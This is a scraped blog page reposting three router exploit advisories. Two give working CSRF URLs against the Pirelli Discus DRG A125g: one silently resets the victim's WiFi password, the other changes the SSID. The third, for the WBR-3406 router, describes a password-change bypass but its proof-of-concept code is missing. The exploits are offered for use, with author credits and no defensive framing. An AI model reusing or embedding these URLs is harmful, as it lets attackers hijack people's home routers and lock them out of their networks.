You Might Also Like

Showing posts with label Change. Show all posts
Showing posts with label Change. Show all posts

Monday, November 25, 2013

[webapps] - Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability

ad


# Exploit Title: Pirelli Discus DRG A125g remote change wifi passwordvulnerability


# Hardware: Pirelli Discus DRG A125g


# Date: 2013/11/23# Exploit Author: Sebastián Magof


# Tested on: Linux/Windows


# Twitter: @smagof


# Greetz: Family, friends && under guys.


# Special Greetz:


# (\/)


# (**) alpha


#(")(")


#Exploit:http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip#info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter thepassword we want to put the victim wifi. If the victim clicks on the urlyour modem / router will reboot automatically with the new passwordprovided by the attacker.


View the original article here

Posted by Abonk at 11:18 AM 0 comments
Labels: , , , , , , ,

[webapps] - WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability

ad


# -----------------------------------------------------------#


WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability


# This PoC code should do two main things:# 1. Cross Site Request Forgery (For more information, just google it).


# 2. This code change to new password without know the current password.


# The vulnerability work in a way that if we remove the "PA=" parameter which is the current password


# the application ignore that and change the password without even entering the old / current password.


# Bug discovered by Pr0T3cT10n AKA Yakir Wizman,


# Date 17/08/2012


# Vendor site - http://www.level1.com/


# ISRAEL# -----------------------------------------------------------


# Author will be not responsible for any damage.# -----------------------------------------------------------


# PoC EXPLOIT


# -----------------------------------------------------------


# -----------------------------------------------------------

View the original article here

Posted by Abonk at 9:55 AM 0 comments
Labels: , , , , , , , , ,

[webapps] - Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability

ad


# Exploit Title: Pirelli Discus DRG A125g remote change SSID valuevulnerability


# Hardware: Pirelli Discus DRG A125g


# Date: 2013/11/23


# Exploit Author: Sebastián Magof


# Tested on: Linux/Windows


# Twitter: @smagof


# Greetz: Family, friends && under guys.


# Special Greetz:


# (\/)# (**) alpha


#(")(")


#Exploit:http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof#info: where the parameter "wlSsid" is where the attacker will enter thenew SSID. If the victim clicks on the url your modem / router will rebootautomatically with the new SSID provided by the attacker.


View the original article here

Posted by Abonk at 7:05 AM 0 comments
Labels: , , , , , , ,
Subscribe to: Posts (Atom)

Advertisements

Advertisements